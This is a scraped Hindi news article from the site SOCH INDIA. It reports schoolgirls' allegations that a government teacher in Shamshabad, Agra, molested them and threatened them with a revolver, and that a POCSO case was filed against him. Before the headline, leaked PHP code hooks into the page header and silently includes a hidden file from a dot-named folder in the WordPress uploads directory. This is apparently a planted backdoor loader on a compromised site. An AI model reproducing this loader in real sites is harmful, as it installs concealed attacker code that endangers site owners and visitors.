add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Agra News: ‘गलत तरह से छूते हैं.. रिवॉल्वर से धमकाते हैं’, छात्राओं ने सरकारी टीचर पर लगाया गंदी हरकत का आरोप – SOCH INDIA
Menu

देश
Agra News: ‘गलत तरह से छूते हैं.. रिवॉल्वर से धमकाते हैं’, छात्राओं ने सरकारी टीचर पर लगाया गंदी हरकत का आरोप

nobanner

उत्तर प्रदेश के आगरा (Agra) से भी शाहजहांपुर के सरकारी स्कूल जैसा मामला सामने आया है. जहां शिक्षक की अश्लील हरकतों और गंदी बातों से परेशान होकर छात्राओं ने स्कूल आना ही बंद कर दिया. छात्राओं का कहना है कि आरोपी शिक्षक उनके साथ अश्लील हरकतें करता था जिसके बाद स्कूल की 67 बच्चियों ने स्कूल छोड़ दिया. ये बात जब परिजनों का पता लगी तो उन्होंने हंगामा कर दिया, गुस्साए अभिभावकों ने स्कूल के गेट पर ताला जड़ दिया. इस मामले में पॉक्सो एक्ट के तहत केस दर्ज कर लिया गया है.

दरअसल, शर्मसार कर देने वाली ये घटना शमशाबाद के लहरा गांव स्थित कंपोजिट विद्यालय की है. जहां तैनात शिक्षक आशुतोष शर्मा जूनियर की छात्राओं के साथ अश्लील हरकत करता था. आरोप है कि वो तलाशी के बहाने उन्हें गलत तरीके से छूता था, जेब में हाथ डालकर छेड़खानी करता था और द्विअर्थी बातें किया करता था. यही नहीं उसने छात्राओं को रिवाल्वर दिखाकर भी धमकाया. छात्राओं ने इसकी शिकायत शिक्षिका और परिजनों से की. जिसके बाद 112 की टीम आरोपी शिक्षक को पकड़कर थाने भी ले गई लेकिन बाद में उसे छोड़ दिया.

आक्रोशित परिजनों ने स्कूल पर जड़ा ताला
छात्राओं का आरोप है कि थाने में दी गई तहरीर पर भी कोई कार्रवाई नहीं की गई, जिसके बाद आक्रोशित ग्रामीणों ने विद्यालय के सामने जमकर विरोध प्रदर्शन किया और स्कूल के दरवाजे पर ताला जड़ दिया. छात्राओं और उनके परिजनों ने बाल अधिकारों की संरक्षण पर कार्य करने वाले चाइल्ड राइट्स एक्टिविस्ट नरेश पारस से संपर्क कर पूरी बात बताई और लिखित रूप में मदद मांगी. जिसके बाद नरेश पारस पीड़ित परिवार को लेकर जिला मुख्यालय पहुंचे और डीएम नवनीत चहल को पूरी जानकारी दी.

छात्राओं से बातचीत में पता चला है कि आरोपी एक लाइसेंसी हथियार भी साथ लगाकर स्कूल आता था और उस असलहे का प्रदर्शन भी किया करता था. इस पूरे मामले में अभिभावकों, पीड़ित बच्चियों ने आरोपी शिक्षक पर कार्रवाई की मांग की है. इस मामले में पुलिस ने पॉक्सो एक्ट के तहत केस दर्ज कर लिया है. वहीं आरोपी शिक्षक मुकदमा दर्ज होने के बाद से फरार हो गया है.